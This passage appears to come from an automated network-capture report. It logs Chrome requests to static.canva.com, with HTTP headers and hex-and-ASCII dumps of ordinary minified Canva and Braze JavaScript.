                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC352INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 34 65 39 50 6d 58 76 48 41 38 4a 64 6a 51 47 4b 31 44 36 57 48 33 76 47 4b 46 41 57 71 75 62 6d 63 76 49 42 74 47 55 48 67 33 66 62 57 79 4d 25 32 46 25 32 46 55 79 46 61 63 64 61 74 68 31 6e 30 74 5a 65 64 51 50 35 6d 38 25 32 46 55 56 65 45 46 79 4c 6c 30 46 44 72 6c 56 63 35 5a 6e 61 48 61 38 6a 59 70 36 48 57 48 48 67 72 51 39 66 45 74 32 44 71 38 4c 61 59 4a 51 6e 6f 72 4a 71 32 25 32 42 73 31 4e 31 6e 33 6f 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4e9PmXvHA8JdjQGK1D6WH3vGKFAWqubmcvIBtGUHg3fbWyM%2F%2FUyFacdath1n0tZedQP5m8%2FUVeEFyLl0FDrlVc5ZnaHa8jYp6HWHHgrQ9fEt2Dq8LaYJQnorJq2%2Bs1N1n3o%3D"}],"group":"cf-nel","max_age":6048
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1193INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 31 33 36 5d 2c 7b 38 39 39 31 37 31 3a 28 74 2c 65 2c 69 29 3d 3e 7b 69 2e 64 28 65 2c 7b 5a 3a 28 29 3d 3e 73 7d 29 3b 63 6f 6e 73 74 20 73 3d 7b 54 6e 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 63 6f 6e 73 74 20 65 3d 28 74 2b 22 3d 22 2e 72 65 70 65 61 74 28 28 34 2d 74 2e 6c 65 6e 67 74 68 25 34 29 25 34 29 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2d 2f 67 2c 22 2b 22 29 2e 72 65 70 6c 61 63 65 28 2f 5f 2f 67 2c 22 2f 22 29 2c 69 3d 61 74 6f 62 28 65 29 2c 73 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 69 2e 6c
                                                                                                                                                                                                                                                    Data Ascii: "use strict";(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[5136],{899171:(t,e,i)=>{i.d(e,{Z:()=>s});const s={Tn:function(t){const e=(t+"=".repeat((4-t.length%4)%4)).replace(/\-/g,"+").replace(/_/g,"/"),i=atob(e),s=new Uint8Array(i.l
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 70 6f 72 74 20 54 65 73 74 22 29 3b 69 66 28 65 26 26 28 65 2e 6f 6e 75 70 67 72 61 64 65 6e 65 65 64 65 64 3d 28 29 3d 3e 65 2e 72 65 73 75 6c 74 2e 63 6c 6f 73 65 28 29 2c 65 2e 6f 6e 73 75 63 63 65 73 73 3d 28 29 3d 3e 65 2e 72 65 73 75 6c 74 2e 63 6c 6f 73 65 28 29 29 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 29 7b 63 6f 6e 73 74 20 74 3d 77 69 6e 64 6f 77 2c 65 3d 74 2e 63 68 72 6f 6d 65 7c 7c 74 2e 62 72 6f 77 73 65 72 7c 7c 74 2e 70 64 3b 69 66 28 65 26 26 65 2e 72 75 6e 74 69 6d 65 26 26 65 2e 72 75 6e 74 69 6d 65 2e 69 64 29 72 65 74 75 72 6e 20 74 68 69 73 2e 76 64 2e 69 6e 66 6f 28 22 4e 6f 74 20 75 73 69 6e 67 20 49 6e 64 65 78 65 64 44 42 20 66 6f 72 20 73 74 6f 72 61 67 65 20 62 65 63 61 75 73 65 20 77
                                                                                                                                                                                                                                                    Data Ascii: port Test");if(e&&(e.onupgradeneeded=()=>e.result.close(),e.onsuccess=()=>e.result.close()),"undefined"!=typeof window){const t=window,e=t.chrome||t.browser||t.pd;if(e&&e.runtime&&e.runtime.id)return this.vd.info("Not using IndexedDB for storage because w
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 2e 69 73 53 75 70 70 6f 72 74 65 64 28 29 29 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 26 26 6e 28 29 2c 21 31 3b 63 6f 6e 73 74 20 72 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 42 64 28 28 6f 3d 3e 7b 69 66 28 21 6f 2e 6f 62 6a 65 63 74 53 74 6f 72 65 4e 61 6d 65 73 2e 63 6f 6e 74 61 69 6e 73 28 74 29 29 72 65 74 75 72 6e 20 72 2e 76 64 2e 65 72 72 6f 72 28 22 43 6f 75 6c 64 20 6e 6f 74 20 73 74 6f 72 65 20 6f 62 6a 65 63 74 20 22 2b 65 2b 22 20 69 6e 20 22 2b 74 2b 22 20 6f 6e 20 69 6e 64 65 78 65 64 44 42 20 22 2b 72 2e 64 61 74 61 62 61 73 65 2e 53 64 2b 22 20 2d 20 22 2b 74 2b 22 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 6f 62 6a 65 63 74 53 74 6f 72 65 22 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d
                                                                                                                                                                                                                                                    Data Ascii: .isSupported())return"function"==typeof n&&n(),!1;const r=this;return this.Bd((o=>{if(!o.objectStoreNames.contains(t))return r.vd.error("Could not store object "+e+" in "+t+" on indexedDB "+r.database.Sd+" - "+t+" is not a valid objectStore"),"function"==
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 26 26 69 28 29 2c 76 6f 69 64 20 6e 2e 63 6c 6f 73 65 28 29 3b 63 6f 6e 73 74 20 72 3d 6e 2e 74 72 61 6e 73 61 63 74 69 6f 6e 28 5b 74 5d 2c 22 72 65 61 64 6f 6e 6c 79 22 29 3b 72 2e 6f 6e 63 6f 6d 70 6c 65 74 65 3d 28 29 3d 3e 6e 2e 63 6c 6f 73 65 28 29 3b 63 6f 6e 73 74 20 6f 3d 72 2e 6f 62 6a 65 63 74 53 74 6f 72 65 28 74 29 2e 6f 70 65 6e 43 75 72 73 6f 72 28 6e 75 6c 6c 2c 22 70 72 65 76 22 29 3b 6f 2e 6f 6e 65 72 72 6f 72 3d 28 29 3d 3e 7b 73 2e 76 64 2e 65 72 72 6f 72 28 22 43 6f 75 6c 64 20 6e 6f 74 20 6f 70 65 6e 20 63 75 72 73 6f 72 20 66 6f 72 20 22 2b 74 2b 22 20 6f 6e 20 69 6e 64 65 78 65 64 44 42 20 22 2b 73 2e 64 61 74 61 62 61 73 65 2e 53 64 29 2c 22 66 75 6e 63 74 69 6f 6e 22
                                                                                                                                                                                                                                                    Data Ascii: ,"function"==typeof i&&i(),void n.close();const r=n.transaction([t],"readonly");r.oncomplete=()=>n.close();const o=r.objectStore(t).openCursor(null,"prev");o.onerror=()=>{s.vd.error("Could not open cursor for "+t+" on indexedDB "+s.database.Sd),"function"
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 64 20 6e 6f 74 20 6f 70 65 6e 20 63 75 72 73 6f 72 20 66 6f 72 20 22 2b 74 2b 22 20 6f 6e 20 69 6e 64 65 78 65 64 44 42 20 22 2b 69 2e 64 61 74 61 62 61 73 65 2e 53 64 29 7d 2c 6f 2e 6f 6e 73 75 63 63 65 73 73 3d 74 3d 3e 7b 76 61 72 20 69 3b 63 6f 6e 73 74 20 73 3d 6e 75 6c 6c 3d 3d 3d 28 69 3d 74 2e 74 61 72 67 65 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 72 65 73 75 6c 74 3b 6e 75 6c 6c 21 3d 73 3f 28 6e 75 6c 6c 21 3d 73 2e 76 61 6c 75 65 26 26 6e 75 6c 6c 21 3d 73 2e 6b 65 79 26 26 28 72 2e 64 65 6c 65 74 65 28 73 2e 6b 65 79 29 2e 6f 6e 73 75 63 63 65 73 73 3d 28 29 3d 3e 7b 61 2e 70 75 73 68 28 73 2e 76 61 6c 75 65 29 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 73 2e 63 6f 6e 74 69 6e 75 65 26 26
                                                                                                                                                                                                                                                    Data Ascii: d not open cursor for "+t+" on indexedDB "+i.database.Sd)},o.onsuccess=t=>{var i;const s=null===(i=t.target)||void 0===i?void 0:i.result;null!=s?(null!=s.value&&null!=s.key&&(r.delete(s.key).onsuccess=()=>{a.push(s.value)}),"function"==typeof s.continue&&
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 6f 67 67 6c 65 4c 6f 67 67 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 73 2e 69 6e 69 74 28 29 2c 73 2e 7a 67 3f 28 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 44 69 73 61 62 6c 69 6e 67 20 42 72 61 7a 65 20 6c 6f 67 67 69 6e 67 22 29 2c 73 2e 7a 67 3d 21 31 29 3a 28 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 45 6e 61 62 6c 65 64 20 42 72 61 7a 65 20 6c 6f 67 67 69 6e 67 22 29 2c 73 2e 7a 67 3d 21 30 29 7d 2c 69 6e 66 6f 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 73 2e 7a 67 29 7b 63 6f 6e 73 74 20 65 3d 22 42 72 61 7a 65 3a 20 22 2b 74 3b 6e 75 6c 6c 21 3d 73 2e 76 64 3f 73 2e 76 64 28 65 29 3a 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 29 7d 7d 2c 77 61 72 6e 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 73 2e 7a 67 29 7b 63 6f 6e 73 74 20 65 3d 22 42 72 61
                                                                                                                                                                                                                                                    Data Ascii: oggleLogging:function(){s.init(),s.zg?(console.log("Disabling Braze logging"),s.zg=!1):(console.log("Enabled Braze logging"),s.zg=!0)},info:function(t){if(s.zg){const e="Braze: "+t;null!=s.vd?s.vd(e):console.log(e)}},warn:function(t){if(s.zg){const e="Bra
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 2c 6e 2e 45 29 28 74 29 3e 6f 2e 5a 2e 6c 72 29 72 65 74 75 72 6e 20 76 6f 69 64 20 72 2e 5a 2e 65 72 72 6f 72 28 60 52 65 6a 65 63 74 65 64 20 75 73 65 72 20 69 64 20 22 24 7b 74 7d 22 20 62 65 63 61 75 73 65 20 69 74 20 69 73 20 6c 6f 6e 67 65 72 20 74 68 61 6e 20 24 7b 6f 2e 5a 2e 6c 72 7d 20 62 79 74 65 73 2e 60 29 3b 69 66 28 6e 75 6c 6c 21 3d 65 26 26 21 28 30 2c 61 2e 72 6f 29 28 65 2c 22 73 65 74 20 73 69 67 6e 61 74 75 72 65 20 66 6f 72 20 6e 65 77 20 75 73 65 72 22 2c 22 73 69 67 6e 61 74 75 72 65 22 29 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 69 3d 73 2e 5a 50 2e 63 72 28 29 3b 69 26 26 69 2e 63 68 61 6e 67 65 55 73 65 72 28 74 2e 74 6f 53 74 72 69 6e 67 28 29 2c 73 2e 5a 50 2e 67 72 28 29 2c 65 29 7d 7d 2c 31 39 35 30 38 38 3a 28 74 2c 65 2c
                                                                                                                                                                                                                                                    Data Ascii: ,n.E)(t)>o.Z.lr)return void r.Z.error(`Rejected user id "${t}" because it is longer than ${o.Z.lr} bytes.`);if(null!=e&&!(0,a.ro)(e,"set signature for new user","signature"))return;const i=s.ZP.cr();i&&i.changeUser(t.toString(),s.ZP.gr(),e)}},195088:(t,e,
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 33 29 3b 66 75 6e 63 74 69 6f 6e 20 75 28 29 7b 63 6f 6e 73 74 20 74 3d 73 2e 5a 50 2e 6c 28 29 3b 69 66 28 6e 75 6c 6c 3d 3d 74 29 72 65 74 75 72 6e 20 76 6f 69 64 20 72 2e 5a 2e 77 61 72 6e 28 61 2e 47 6f 29 3b 74 2e 63 6c 65 61 72 44 61 74 61 28 29 3b 63 6f 6e 73 74 20 65 3d 28 30 2c 6e 2e 58 50 29 28 6f 2e 5a 2e 59 74 29 3b 66 6f 72 28 6c 65 74 20 69 3d 30 3b 69 3c 65 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 63 6f 6e 73 74 20 74 3d 65 5b 69 5d 2c 73 3d 6f 2e 5a 2e 59 74 5b 74 5d 3b 6e 65 77 20 6f 2e 5a 28 73 2c 72 2e 5a 29 2e 63 6c 65 61 72 44 61 74 61 28 29 7d 69 66 28 73 2e 5a 50 2e 58 28 29 29 66 6f 72 28 63 6f 6e 73 74 20 69 20 6f 66 20 73 2e 5a 50 2e 67 72 28 29 29 69 2e 63 6c 65 61 72 44 61 74 61 28 21 30 29 7d 7d 2c 38 34 32 34 31 37 3a 28 74 2c
                                                                                                                                                                                                                                                    Data Ascii: 3);function u(){const t=s.ZP.l();if(null==t)return void r.Z.warn(a.Go);t.clearData();const e=(0,n.XP)(o.Z.Yt);for(let i=0;i<e.length;i++){const t=e[i],s=o.Z.Yt[t];new o.Z(s,r.Z).clearData()}if(s.ZP.X())for(const i of s.ZP.gr())i.clearData(!0)}},842417:(t,
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 74 2c 74 68 69 73 2e 4e 65 2c 22 64 61 74 65 74 69 6d 65 22 29 7d 59 28 29 7b 63 6f 6e 73 74 20 74 3d 7b 7d 3b 72 65 74 75 72 6e 20 74 5b 6e 2e 74 74 2e 68 74 5d 3d 74 68 69 73 2e 69 64 2c 74 5b 6e 2e 74 74 2e 6c 65 5d 3d 74 68 69 73 2e 65 6e 61 62 6c 65 64 2c 74 5b 6e 2e 74 74 2e 70 65 5d 3d 74 68 69 73 2e 70 72 6f 70 65 72 74 69 65 73 2c 74 5b 6e 2e 74 74 2e 46 65 5d 3d 74 68 69 73 2e 74 72 61 63 6b 69 6e 67 53 74 72 69 6e 67 2c 74 7d 50 65 28 74 29 7b 73 2e 5a 2e 69 6e 66 6f 28 60 50 72 6f 70 65 72 74 79 20 69 73 20 6e 6f 74 20 6f 66 20 74 79 70 65 20 24 7b 74 7d 2e 60 29 7d 79 65 28 74 29 7b 73 2e 5a 2e 69 6e 66 6f 28 60 24 7b 74 7d 20 6e 6f 74 20 66 6f 75 6e 64 20 69 6e 20 66 65 61 74 75 72 65 20 66 6c 61 67 20 70 72 6f 70 65 72 74 69 65 73 2e 60 29
                                                                                                                                                                                                                                                    Data Ascii: t,this.Ne,"datetime")}Y(){const t={};return t[n.tt.ht]=this.id,t[n.tt.le]=this.enabled,t[n.tt.pe]=this.properties,t[n.tt.Fe]=this.trackingString,t}Pe(t){s.Z.info(`Property is not of type ${t}.`)}ye(t){s.Z.info(`${t} not found in feature flag properties.`)


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    22192.168.2.449763104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC787OUTGET /web/f919d823e68691c3.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:27 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 2941
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a0e28436a4f-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 71056
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "f1580512de3ac255d76178fc682b9f0c"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:13 GMT
                                                                                                                                                                                                                                                    Last-Modified: Thu, 19 Dec 2024 01:30:34 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 20 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: pi/m2SpWzGysZBtohndFPYrCAwVjUFZJ/XAT3j6T0Me0eMTTrxHUTs1wyDotzQrEZIqkiDZM6eU=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: XWYKYWJEDPAW281K
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: 6Qnk_U8Kp9nmDUFIssF05sqAw_I_OOfu
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC346INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 50 63 56 77 45 53 6a 62 7a 78 6b 76 58 58 36 72 63 57 69 31 74 73 7a 69 65 6a 77 6b 39 69 49 4c 6f 53 4e 62 47 67 34 36 31 37 6a 4e 44 30 30 4f 51 74 44 4d 4f 64 6d 43 74 79 66 36 77 31 6e 43 32 6b 76 48 6d 33 56 4e 6a 49 34 72 25 32 42 32 35 54 75 61 76 54 55 66 74 54 46 6f 66 68 62 39 59 7a 42 55 44 4e 63 4a 32 79 36 4a 49 43 36 70 4f 67 61 63 4d 61 38 78 41 69 7a 55 4b 45 56 79 45 4f 4f 34 63 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PcVwESjbzxkvXX6rcWi1tsziejwk9iILoSNbGg4617jND00OQtDMOdmCtyf6w1nC2kvHm3VNjI4r%2B25TuavTUftTFofhb9YzBUDNcJ2y6JIC6pOgacMa8xAizUKEVyEOO4c%3D"}],"group":"cf-nel","max_age":604800}N
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1203INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 33 30 32 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 31 35 33 33 32 35 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 73 65 6c 66 2e 5f 66
                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1302],{/***/ 153325:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._f
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1369INData Raw: 49 59 2e 75 73 65 52 65 66 3b 5f 5f 63 2e 70 38 61 3d 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 28 34 32 37 38 32 29 2e 45 48 3b 76 61 72 20 67 38 61 3d 6e 65 77 20 4d 61 70 28 5b 5b 22 70 61 67 65 22 2c 22 6e 75 6d 62 65 72 22 5d 5d 29 3b 4a 59 3d 5f 5f 63 2e 4a 59 3d 7b 4c 49 4e 45 41 52 3a 31 2c 4c 68 3a 32 2c 54 66 3a 33 2c 66 6c 3a 34 2c 69 43 3a 35 2c 4c 76 3a 36 2c 67 47 3a 37 2c 6b 52 3a 38 2c 68 52 3a 39 2c 6c 52 3a 31 30 2c 66 52 3a 31 31 2c 67 52 3a 31 32 2c 56 62 61 3a 31 33 2c 6d 52 3a 31 34 2c 49 6e 3a 31 35 2c 4e 62 61 3a 31 36 2c 4f 62 61 3a 31 37 2c 50 62 61 3a 31 38 2c 51 62 61 3a 31 39 2c 52 62 61 3a 32 30 2c 53 62 61 3a 32 31 2c 54 62 61 3a 32 32 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 67 6e 61 3d 28 62 2c 63
                                                                                                                                                                                                                                                    Data Ascii: IY.useRef;__c.p8a=__webpack_require__(42782).EH;var g8a=new Map([["page","number"]]);JY=__c.JY={LINEAR:1,Lh:2,Tf:3,fl:4,iC:5,Lv:6,gG:7,kR:8,hR:9,lR:10,fR:11,gR:12,Vba:13,mR:14,In:15,Nba:16,Oba:17,Pba:18,Qba:19,Rba:20,Sba:21,Tba:22};(function(a){a.gna=(b,c
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC369INData Raw: 4a 59 2e 66 6c 5d 3a 4d 59 2c 5b 4a 59 2e 69 43 5d 3a 4d 59 2c 5b 4a 59 2e 4c 76 5d 3a 4d 59 2c 5b 4a 59 2e 67 47 5d 3a 4d 59 2c 5b 4a 59 2e 6b 52 5d 3a 4d 59 2c 5b 4a 59 2e 68 52 5d 3a 4d 59 2c 5b 4a 59 2e 6c 52 5d 3a 4d 59 2c 5b 4a 59 2e 66 52 5d 3a 5b 2d 2e 32 38 2c 31 5d 2c 5b 4a 59 2e 67 52 5d 3a 5b 30 2c 31 2e 32 38 5d 2c 5b 4a 59 2e 56 62 61 5d 3a 5b 2d 2e 31 37 2c 31 5d 2c 5b 4a 59 2e 6d 52 5d 3a 5b 30 2c 31 2e 31 37 5d 2c 5b 4a 59 2e 49 6e 5d 3a 4d 59 2c 5b 4a 59 2e 4e 62 61 5d 3a 4d 59 2c 5b 4a 59 2e 4f 62 61 5d 3a 4d 59 2c 5b 4a 59 2e 50 62 61 5d 3a 4d 59 2c 5b 4a 59 2e 51 62 61 5d 3a 4d 59 2c 5b 4a 59 2e 52 62 61 5d 3a 4d 59 2c 5b 4a 59 2e 53 62 61 5d 3a 4d 59 2c 5b 4a 59 2e 54 62 61 5d 3a 4d 59 7d 2c 70 48 3a 5f 5f 63 2e 4c 59 7d 3b 0a 7d 29
                                                                                                                                                                                                                                                    Data Ascii: JY.fl]:MY,[JY.iC]:MY,[JY.Lv]:MY,[JY.gG]:MY,[JY.kR]:MY,[JY.hR]:MY,[JY.lR]:MY,[JY.fR]:[-.28,1],[JY.gR]:[0,1.28],[JY.Vba]:[-.17,1],[JY.mR]:[0,1.17],[JY.In]:MY,[JY.Nba]:MY,[JY.Oba]:MY,[JY.Pba]:MY,[JY.Qba]:MY,[JY.Rba]:MY,[JY.Sba]:MY,[JY.Tba]:MY},pH:__c.LY};})


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    23192.168.2.449767104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC787OUTGET /web/32526717065b2b04.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
                                                                                                                                                                                                                                                    2024-12-19 21:27:27 UTC1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:27 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 22394
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a0e4c19b9c5-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 71056
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "495c0ac6bd7bac84d05d17cf85abe15d"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:13 GMT
                                                                                                                                                                                                                                                    Last-Modified: Thu, 19 Dec 2024 01:30:33 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
